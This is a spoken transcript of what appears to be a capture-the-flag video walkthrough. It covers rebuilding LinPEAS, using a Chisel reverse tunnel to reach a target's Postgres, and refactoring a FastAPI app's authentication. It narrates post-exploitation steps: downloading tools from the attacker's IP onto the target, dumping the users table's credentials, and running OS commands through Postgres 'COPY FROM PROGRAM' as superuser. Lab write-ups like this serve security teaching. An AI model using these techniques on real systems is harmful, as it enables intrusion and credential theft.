LinPEAS. So let's go into LinPEAS and then go to builder. I can probably Python 3 LinPEAS builder.py, and it errored. Let's see. Does LinPEAS, does he have any instructions for building? Contributing. Check out to do. So these are things that he wants added into LinPEAS. That's not how to contribute. It's auto built. Auto builder from LinPEAS builder. Huh. So I'm going to go in the parent directory real quick. I'm going to grep this for LinPEAS builder. We do have this pi cache. Wonder if it's not pi. There we go. So we have a GitHub workflow. And that's probably how this is being built. So if I bless this file, builder, so it makes sure PyYAML is installed, goes into LinPEAS, and then runs this module. Okay, so that should be simple enough. So I'm going to go into LinPEAS, run the exact module that it said, and here it is going to start building a new copy of LinPEAS. So with this copy, hopefully it has the create user check. And then when we run it against it, we'll see if the SNMP config shows us what we want, right? There we go. It is now done. If I do a ls, I'm guessing it's linpeas.sh. So I'm going to grep create user on linpeas.sh. And we have the regex we have created. So let us python 3-m http server to host this. We probably should delete this web server, start this one up, and then we can run this again. And this time, hopefully, when we grep it for the super secure password, it will show us the line that we want. Okay, LinPEAS has finished. So let's run the same grep we did before on linpeas.out, and we can see it has now found the password. So we are now free to create a pull request on LinPEAS and add our check-in. So we will always see these create user things. So with that being said, that's going to be the box. Hope you guys enjoyed it. Take care, and I will see you all. Actually, not the end of the video. There are two more things I wanted to show that I couldn't find a good place to sneak them into the video. The first piece is just simple using Chisel to forward Postgres to our server so we don't have to modify the web server code in order to get the password, because that is a dangerous thing to do. If you screw up the code, the web server goes down, you lose your shell, and you also lose your access. So doing Chisel just to forward Postgres is going to be the easier thing. And then after that, we're going to fix up the FastAPI, do some development. So yeah, hope you enjoy the additions. So let's say we can run Chisel on this box, which we could have in the first place. So let's get it on there. So let's do Python 3, HTTP server. Before I download it, I'm going to cat db.py. I'm going to copy the Postgres URL, and we're going to just save it on this pane, right? So let's go dev shm wget 10.10.14.8 port 8000, and I will download Chisel like that. And it's going to take a minute to download. And on this pane, we can start up a Chisel server. So I'm going to do /chisel server. We'll add -- reverse. And by default, I want to say it listens on port 8080. So I'm going to change it to 8001. So in this pane, we can connect our client to it. And Postgres, I forget what port it runs default. I want to say like 54321. So let's do psql-h or --help. 5432 is the default port of Postgres. So let's do Chisel and then client, and we can connect to 10.10.14.8 port 8001, and we're going to do a reverse on port 5432 127.0.0.1 5432. Permission denied. Let's move Chisel to temp, because I guess we can't execute out of dev shm. Run this. And I don't see it connecting back to me, so I must have the syntax wrong. Let's see, do we have NC on this box? We do. NC 10.10.14.8, 8001. Let's do a -ZV. We can see the port is open. And that command does look right to me. So I'm going to kill the server and add a -v, so I have verbose. Run it again. and we see some type of thing. Oh, the server cannot listen on 5432 because either something's listening here or it just doesn't have permission. So let's do SSLNTP grep 543, and we can see Postgres is running on my local computer. So I'm just going to a sudo service PostgreSQL stop. I'm guessing like Metasploit or something had started it up. So now I'm going to run this. We can run it again. And it looks like we have a connection. So I can see the proxy was connected. And the reason why I want to listen on this port is because later in the video, or maybe earlier in the video for you guys, I want to use this tunnel and play with the actual FastAPI server locally. And I don't want to stand up Postgres on my local box. So at some point in this video, we use this connection to host the web server. At least that's my plan. So let's start up PSQL. We can connect to it. Let's see. Let's do --help. And we want to do PSQL-H. This will be, oh, we can probably do localhost now. And we screwed up this. We don't point it to 127.0.0.1. We want to go to 172.22.0.1. Like that. There we go. And now we're in the database. So what we did here is this is a reverse shell. And by default, it's going to map to 127.0.0.1 on this end. And this end is my local box. So I bet if I go to this, we do SSLNTP grep 5432. I guess it's 0.0.0 by default, which that is probably bad, right? So I guess when you run chisel and you do this, bind it to localhost. So now this is the port we open locally. And then anything that connects on this local port, we send it to this guy. So now if I do this SSLNTP, we're not listening on all IPs, we're listening on 127. So now we can enumerate Postgres. And the syntax is really weird. \L is like list databases, I think. Or list server info. Nope, there we go. List databases. And we can see this database exists. We already connected to it with our Postgres like URL thing that we connected to. So that doesn't matter. We can do \DT. This is going to be like describe tables. And I did not do this. I guess this is an artifact from testing. If you ever see this table, it is pretty bad because it means someone probably hacked you. So we'll go into that after we do this. We see the users table. We can do \D+ on users. And we see ID, email, username, password. So the D+ is like describe in MySQL, right? So we wanted username, password, and email. So we can probably do select star, right? From users. And this is how we can get all the credentials. I'm actually kind of curious. Select star from cmd exec. We can see they ran the ID command, it looks like. So if we wanted to, we can say drop table if exists, cmd exec to delete it. So if someone hadn't ran command execution, we would do a create table and then cmd exec. You can name this anything you want, right? I'm going to give it cmd output as the table name. So now if I do the \D+ on cmd exec, we can see it has one column cmd output. So now we can copy cmd exec from, and then Postgres has this program thing. And we can say, we already did the ID command, right? So let's do hostname. And it copied one. And we can do a select star from cmd exec. And we see the host name is this, which is the Docker container name. This is only if you're a privileged user. You can run /du, and we see the Postgres user is a super user. So that's why we can do it. We could also like IP-addr, command not found. If we do ID, select star, and we can see the two commands ran. So that's the host name. This is the ID command. We could get a reverse shell as well, but this is, oh, there's 28 lines here. So that ls, you can see that. So this is how you execute command on Postgres. So hope this piece has helped you, and let's continue on with the video. So earlier in the video, I talked about my dislike for not having all the locks next to each of these individual endpoints, showing it's an authenticated one, mainly because like this thing didn't work as you would expect in the Swagger. Also, it's just nice to have visuals so you know what's authenticated and not. So let's go and fix this app up to see exactly how it works. The very first thing we have to do is get our development environment working. And I do have a active chisel currently. And we did this earlier in the video where we set up a chisel to forward the Postgres port to my local box. So I don't have to worry about setting up the database or anything because I'm going to use the quote unquote production database. But I do have to get the code on my box to a place where I can actually work with it. So let us go on the box after we rooted it. And I can do a docker ps because the actual web app is in this Docker API container. It may exist on the server somewhere. I don't know where it is. So I'm going to access it from Docker. So I'll do docker exec-it. This is going to be like interactive terminal, I think it stands for. It may not be, but that's how I remember it. And then I'm going to start inputting the container ID I want, which is 29AF. And we have to say sh to execute shell on it. So now I'm on the container. I'm going to go up one directory, make sure tar is on the box, and then we'll create an archive app.tar.bz2 and put this in it, right? We may want to exclude PyC files just because we don't need them. It automatically would create it, but the container itself is small, so that doesn't matter. If I do a lsla, it looks like they already had a backup once, but we have ours currently. So now I can do a docker cp command. So I'll do docker cp for copy, and then 29af, and then we want app.tar.bz2, and I'll copy that to dev shm. So if I go in dev shm, we have app.tar.bz2. I can do an xjvf on it, and it extracts it, but I meant to just copy it to my box. So let's do python 3-m http server. It's in use. Let's just put it on port 8001. Then we can wget 10.10.11 193 8001 app.tar.bz2 tar xjvf, extract it, and then we can go in and just run codium. And now if we go to main, press F5 to start the program, let's see what happens. No module named app. So let's see. I'm in the app directory and it's trying to import itself. We could try fixing up all these imports, but I hate messing with the code. So I'm going to go here, new file. I'm going to call this did that do what I expected? If I save it? Okay. Run.py, I'll call it. There we go. And what we want to do is copy this uvicorn command into Python. So let's see. I need to import uvicorn. Then we can, from app, we're going here. So we're going in this directory. And we'll do app.main import app. So we go in the directory, go in main, and import this, which is going to start it. And let's see, if name is equal to main uvi corn.run. We do app, and then host is equal to zeros, and port is equal to, we'll start on 9001. So I think that's going to work. Save the changes. F5 to run this file. I'm expecting to see like a FastAPI thing. I don't know what it's doing. Let's see. Maybe we do from app import main. That doesn't look right. And I just realized what it is. It's probably hanging on the database because it's trying to connect to 172. So let's edit the database to point it to localhost. And I'm going to do app.main import app again because I think that's how we do it. Run it. And let's see, does it talk to the database now magically? No. Let's see. If I set a breakpoint here, do we hit it? We did not hit that breakpoint. See, did I do this wrong? Okay, so I did the if name equals main thing wrong. So I just want to check one thing. Let's just print name to see exactly what this is. I'll set a breakpoint there. Underscore main. Okay, that was it. That's what I want. It's the simple things. And I still have that commented out. Run it. And there we go. We have UVI corn running on localhost 9001. So if I go localhost 9001, we hit the page, we can go to /docs. And if I try this, let's do on get users, just make sure this is working as intended. So let's see, users, get, if I just set a breakpoint here, hopefully when I request this, unprocessable. It may be because the dependency did not even hit. Let's do it on add a user because this one is not required to log in, I think. Right, get user by ID. Let's see, auth. It would be here, sign up. There we go. So there's no, if we looked at users, we see this dependency, and this is requiring them to be logged in. But if I go to auth, there's no dependency there. So I can set a breakpoint here and test if we have it for sign up. So try out, execute, and we broke. So we have confirmed our IDE is set up correctly, right? And I bet if I look at user schema here, we can see all the variables it is. If we go click here, we could navigate the variables as well. So now the next step is to stop the server. We can clear our breakpoints that we set, and we'll start with fixing the authentication. And majority of this is going to come from the Swagger documentation. So if I just go over to Google and I Google like FastAPI put lock on Swagger, see what happens. We go to this first steps page and let's see, we have the lock right there. So it's telling us what we have to do. And essentially, we just have to use this OAuth password to bearer and put it on a form. But this gives us an authorization button so we can log in Swagger, and also tells us which endpoints require authentication. So it's going to be a little bit messy going to the app and doing it, but let's take a stab at this. And I'd probably create like a auth.py file above the API to do most of these variables, but for the sake of quickness, it's not going to be great code. So the first thing we have to do is create the OAuth2 scheme, right? Like this thing. And this token URL is going to be where things go to log in. And the application goes to /auth/login. So that's why I'm going to put it there. We'll also have to import this library. So we can just import it. And then how we use this is in the function like read items, we're going to do it on get users. We just put this here, right? So I can copy this string and let's go to get users and I'm going to put it there. And let's see, I think I can do something like this just to make it a bit easier to read. So now that the tokens is here, it should have a lock on the get users page as long as everything is correct, which it probably isn't, but we'll cross that bridge when we get there. So application has started up. Let's go to localhost 9001. We have an authorize button now, and we do have a lock, right? And if I click the lock, it wants us to log in. So we have this auth login, and we give a username and password. So let's make sure we create a user. So I'm going to create root at ipsec.rocks. Username is going to be ipsec, password of password. So if we execute this, let's see, internal server error. Missing field, a validation. Huh. Let's see if it created the user real quick. So let's try it out. Root ipsec.rocks ipsec and the password of password, I think we said. Okay, so the user's created. It just errored on returning data probably. I noticed that a lot with like Pydantic things. I'm guessing like the actual create user returned based upon this. It was expecting to see a password in some Pydantic thing, and it did not have the password. We can see Pydantic errors wrapper 1 validation for user DB. So if we really wanted to, we could set a breakpoint and look at it. I guess now that I said it, we have to do it, right? So let's go to auth and test my theory. So the response model is user DB. So I'm guessing there's something in this user DB that either existed or, remember when we edited the user DB to add password? It looks like we broke user registration. So I added this field so we could export the passwords easily. So now let's set a breakpoint, like I said, and we can go back to the browser and sign up. I'll do root2 ipsec2 execute. We break here. If I do res, we can see we only have these 3 fields, email, ID, and username. But the user DB response model is expecting 4 fields. So that's why it failed. If we got rid of this and then we redo it, so let's go back to run, start it up. And I guess we can do root 3, execute. If I look at res now, it is the same thing, but user DB isn't going to expect that extra thing. And the response body is now user ID 8. So that was the issue. It was just something we had done, but that is why I like IDEs and setting breakpoints, because you can see how quickly we can troubleshoot that. So now we have the auth login, if we do username, IPsec, password, or password, we get the JWT token back. I'm going to copy this middle address, echo-n, put this in base 64-d. We can see this is what the token looks like. If I go to the authorize field and we do IPsec password and click authorize, we get an error message. And if I look at the terminal, unprocessable entity, and I'm going to guess it's a very similar thing. We have this payload user schema that we're passing, and it wants email, username, and everything. It also wants it in JWT format, like JSON. If I send this to Burp Suite, let's go here, Burp Suite, where is Burp, proxy on, authorize. We see it's not a valid dictionary. And again, it wants it like JWT format. And then if we did this, I'm going to guess it's going to still want the email because we specified email as a field in Pydantic, right? So did I do this correctly is the thing. Valid is not a dict. Where is encoding? Is it just application JSON? Now it wants email. So if we did email root at ipsec.rocks, like that, we need a comma here. We get returned. So what we want to do is convert this form in order to allow just form data and confirm with the OAuth 2 standard. So I'm going to stop the web server. I'm going to go into auth. And let's see. We no longer want Pydantic here. So what I'm going to do is, let's see. We can just do payload is equal to, and then OAuth 2 password request form is equal to, I think depends like that. And then we'll have to import this. Let's see, is that on this page? Not there. I'm going to guess it's just in fastapi.security. So fastapi.security import. Let's do this. Save it. And let's see where this errors now. So if I go run Python file, does it start up? Pass the sniff test. So let us intercept another login request because that one is all jacked up. There we go. So we're getting not authorized. So something isn't working right off the bat. If I look here, we're getting forbidden when we hit auth login. So again, let's just step through this. So if I send this, if I look at what payload is, let's go to debug console, do payload. And we have password and username here. So this looks good. So let's step into the login function. And looking at this, we have a field that we did not account for. It wants the email. So if I do payload.email, there's no attribute. So it's erroring here, right? If we step exception as E, if I look at the exception, let's see, E. OAuth 2 password request form has no attribute email. So that is the issue. I'm just going to kill off searching for email. And that's probably going to create other vulnerabilities in this application because I think you can have duplicate usernames, maybe not duplicate emails, or maybe it's not duplicate both. But now we have this. So when I run this, let's try logging in again and seeing what we get. So it started, we send it, and we're going to hit this. And let's look at what its success is. So I'm just going to type success. And hey, it's not none. So we have something here. So now we're going to return a create JWT. And I just want to see what this is. So I'm going to copy this command, run it here. And let's see. So it's going to error here because we did payload here. And payload has no attribute email. And if we remember, email is in the JWT. So what we could do is if we looked at the login, it was returning this whole row, right? So if we look at success, let's see, do we see it easily here? Row, let's see. If I go success, is it special variables? I don't know a good way to view this, but I know SQL Alchemy. So if success, and then what fields were in this table. So success username is IPsec, success email is that, is password even in here? The password hash is as well. So the success is because we went to login and the database fetch one query. So we have the results of that query labeled as success. So what that allows me to do is replace payload username with success. So let's stop this and do success. And then these are horrible names. We probably should be renaming all of these names. But again, just showing how I would go about this, right? We can leave this here. Shoot, I don't want to run there. I want to go to run.py, run it. Wait for this to start up. Hit send. And now we can step over that. We have success. And if I copy this, debug, we have created the JWT, which is great. So now run. If I go back to my browser, let's see. I can turn Burp Suite Intercept off. We can take this debug off. It says we are logged in. So this has successfully logged us in. And now when we try this out, let's put something junky in there. Intercept, execute. Shoot. We should have the bearer token here. It says undefined. So how we returned this data, FastAPI did not like. So if I go back to login, we probably want to return a dictionary. And the first field is access token because that's what this is. And then we want to tell FastAPI what the token type is. And the main reason I know this is because I've done way too much work with FastAPI. I think that's how I do it. Let's run this again. Stop the server. Run. If I go to the repeater tab, send it, we can see how this is sending, right? It was before just this string. Now we have this data. So authorize, let's log out and redo this flow. So username, IPsec, password. We click authorize, we're logged in. And now I'm going to turn intercept on. We click execute here on the field that has the lock. And we no longer have undefined. We have the authorization header how it should be. That being said, we have to update this field in order to do the processing the token correctly. So the first step is to figure out exactly what errored. Looking at the code, we got invalid header padding. I'm guessing, it's been a while since I looked at this, but the isLogged function, I don't think is accounting for the word bearer in play. So I think that's why it's breaking on the JWT. So I'm going to copy this isLogged function, and we're going to redo this. So let's just send it, and we get here, and let's see, authorization. So I'm going to put this in, and we see authorization space, bearer space something. So if I go in this verify JWT function, I'm guessing, let's see, payload jwt.decode. So if we look at token now, it is that. And if I attempt to decode this, we have invalid padding. But again, I'm almost positive it's because of bearer, right? So if we do token.split and grab one, there we go. So I'm just going to do token is equal to that. So now we got rid of the word token. And if I do this JWT again, it works. So that is the issue. But this issue is pretty big stemmed because I don't like how it does this altogether. So I would take out these dependencies here. And what I want to do is not have this to be token. I want this to be the user variable. So I'm going to do current user here. And instead of this depends OAuth2 scheme, I'm going to create a new function in utils that returns the user object. And that will do the parsing of the JWT. And then down here, you could say like if user is admin, right? Instead of putting it all up in the responses. Not sure if that's the correct way, but I think this will be cool and a fun demo. So let's see. We need to go in utils. And this is the verified JWT. I'm just going to call this one parse token. Let's see. Copy, put some spaces, parse the token. Okay. Call it parse token like that. And then we have to make this async. And we can do token string equals depends OAuth2 scheme. And we probably have to import that. So let's go back to users. What was this? We can copy and paste. Let's see, OAuth2 password bearer. We probably need this library as well. And this should all be just in one file. Like I should not have this OAuth2 scheme stuff in here. And once we do this, we can probably remove it because we're moving over to utils. So let's go back to parse token. So now we're taking in the string. And this, we want to return a Pydantic object. And if we look here, we have models import user schema. So if I do user schema dot, I think user DB or something. Let's see. What is user schema? Okay, this is fine. No, we don't want password. We want user DB. Actually, I'm going to create, we'll use user DB now. If I was doing this for an actual app, I'd probably have a different one and also put the group in. So this group could be is admin, but I don't remember the Postgres structure right now. So we can just do user DB. That'll be fine. Let's see, verify JWT parse token. So we can just say this, and up here, we can import that so we have it. And now we have this piece. So the first thing I want to do, I'm going to create the credential exception. I'm just copying this from another project I have. All it does is sets this, and we can return this if we error out. So if we can't parse the token, that's what we're going to do. So let's see, try. I don't know why we declare this as secret, but okay. And then the token, I think that may be fine. Because I think how we're parsing this, I think it'll grab bearer, if I remember correctly. So secret, okay. And then what we want to return is not true. We want to return payload, I believe. Because that would be what the JWT is. And then except we can just return, or because this is in async, we don't return, we do a raise. So raise credential exception because we're unauthorized. Let's see. I think this is how I do it. And the exception, it'll probably just be JWT error. I'm curious how this works. So let's just see if this application starts, and if it does start, if it even works. So parse token is here. We can add parse token. This should be not a string. I would guess like that. And I will break here because if everything works, we'll have a user there, but I don't think we do. Tell me where my code fails. Okay. Depends is not defined. So that was defined here. Where is depend? FastAPI. We can just import it. There we go. Let's see where I fail. Okay, let's see. Invalid args for response field. Depends parse token is a valid Pydantic field type. I'm guessing since the code was previously like this, we just have to put the user DB field here to tell it this is how we parse it. Let's see what happens. And this is pretty much how software development goes, at least for me. We just fail our way to victory. I mean, it's also how pen testing works, right? We just keep failing and failing and failing. Eventually, it works. So name status is undefined. Utils.py line 49. So utils 49. We have to import something here. Let's see. Status. I'm guessing, yeah, status is not defined. So let's see, look at our imports, and let's just add status here, because that should be a FastAPI thing. Run it. We start up, send this, and we get all the way to our get user endpoint. So now the moment of truth is, what does current user look like? We have current user is the variable here. So this is looking great. We can return. And if we look at what came back in Burp Suite, where'd you go, Burp? There you are. We have a list of all our users. So everything seems to be working better. The only thing that we haven't done is before this required us being admin, and we don't have an admin field here. So do I still have a Postgres connection up? I do. Let's see. It was like /d plus users, right? To describe this users table. And we don't have groups here. So the issue we're running into right now is we don't have an admin field and /dt. There's no groups table. So how this application was doing admin before is, let's see, if we go to is admin, it's just checking if the username is a string. So there's no information in Postgres to do this easily, which makes it painful for us. In a perfect world, we could go back to our utils and where parse token is, where we return, let's see, is this where we return the token? No, we return the token on, let's see. Let's go through the field. So if we go to auth, we have this as CRUD login payload. And this returns something. Success, username. So the create JWT. Here we should be able to pull the group, right? So I don't know a good way to show this because we don't have groups in the database. Let's see. Where is parse token? Is admin. Authorization string header. Yeah, this is a mess. Okay, let's just say payload is equal to this. We can say if username is equal to ipsec, then is admin equal true, like that. And before this, we can say is admin is equal to false. So again, we're hard coding the admin check, but this payload now can do admin and is admin, like this. So when we return the token, we'll return if we're an admin or not. And now, since we did that, we got to look at where this was used, which, let's see, it was the user DB, right? So this will be capital user. And let's go back into models. Whoops. And I'm just going to do user DB. Okay, I think this works. So actually this is admin. So what I did here is I created a new class. And since I did user DB here, I think it's going to take all the base things of this and then also add is admin. I want to say that's how it works. We'll find out. So let's go back here. Let's see, utils, user. So now we also have to import this. Did I already do that? I did not. And it may be a Golang habit for me, but whenever I like export something between different namespaces, Golang does things if its first letter capital is global. So if you're wondering why I decided to randomly capitalize that, that is why. So that is good. If we go to users now, we're no longer user DB, we're user. And we want to import that. And let's see if this works. I don't think it will. I know I forgot something. So let's log in. Oh my God. Let's see. Echo base64-D. Hey, admin is equal to true. So we've already put that in our thing. So it worked first try. That is actually amazing, right? And we have a breakpoint on this get users thing, right? So if I, let's see, go back here. Is this get users? Here. And if I do my current user now, it does not say admin, which is bad. Because the whole idea is I should be able to parse this and get that. Where did you drop admin? Let's go to parse token. Let's see, we return user. JWT decode. Oh, because I didn't re-log into the application. That's why. So I bet if I went to this, was it this or this? It was definitely this one. And we copy the new access token and we paste it. This will probably now work as we expect. Send, we break. Now I'm going to look at current user. Echo-n, base64-d. So that did not have what I expected. Let's just log in again. So I'm going to stop, run, and then let us authorize log out, ipsec password, authorize to log in. Let's go to burp suite, turn intercept off. You can return that, sure. So now we're logged in. I probably should refresh this page because we changed it. You'll notice there's no parameters here because it's coded to take it from the token, right? If I execute this, we get not authenticated. So let's authorize ipsec password. Okay. Now I'm going to click execute again. It returns here. Let's look at what current user is. Hey, we have admin is equal to true. So that is all working. Go back to the page and we've dumped everything, right? So let's pretend the database requires, let me finish my train of thought real quick. So we go here, where do we do it? Okay, so in the create JWT, if the database column was saying ipsec not an admin, so I'm going to say if username is ipsec2, or we'll do please subscribe, which we are not. So I save this, we restart. Okay, I click execute, we're here, current user. We need to re-log in because we got our JWT. And this is one of the reasons why you don't put group information in JWTs, because they're valid until they're not, right? So now I got my new JWT. We screwed something up. ipsec password authorize. I don't know what we screwed up. Well, it's not running. That is the first issue. Start it. Okay. Refresh. Authorize. ipsec password. So that was probably the issue. I just wasn't running. So we execute this, and I look current user. Admin is equal to false. So what I could do is say, let's see, if current user admin, return that. And then what is the default thing? Whoops. Status. Let's just add this. Let's see. Let's just do this and return credentials exception, FastAPI status. Let's just see how this looks. So now I'm running. Execute, internal server error. one validation. What? We hit this. So current user. Let's see what this looks like. Is it a dot? No. Oh, we need to return a wait. No, we don't. Let's just get rid of the exception piece. Video's getting long. Let's just wrap it up, right? So if I return nothing, what happens? Internal server error. Oh. The issue is it's expecting list user DB. So it's expecting to return this model, right? So because it's expecting this, it's erroring out because blank string does not validate this Pydantic object. So if we look at what CRUD get users is, it's returning something in Pydantic, but I think that'll be it for the video. You get most of the point. If we make ourselves admin, it'll return everything again, so we can prove that and then wrap up. So let's see. Do we have ipsec2 as a user, or we can just make ourselves admin again? Let's see, where was it? Was it users? No. Could have swore it was util. Create JWT. Oh, username. Please subscribe. So now I set myself to admin. Let us log out. Log in to get a new JWT. Execute. And we get a list of users. So that'll be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.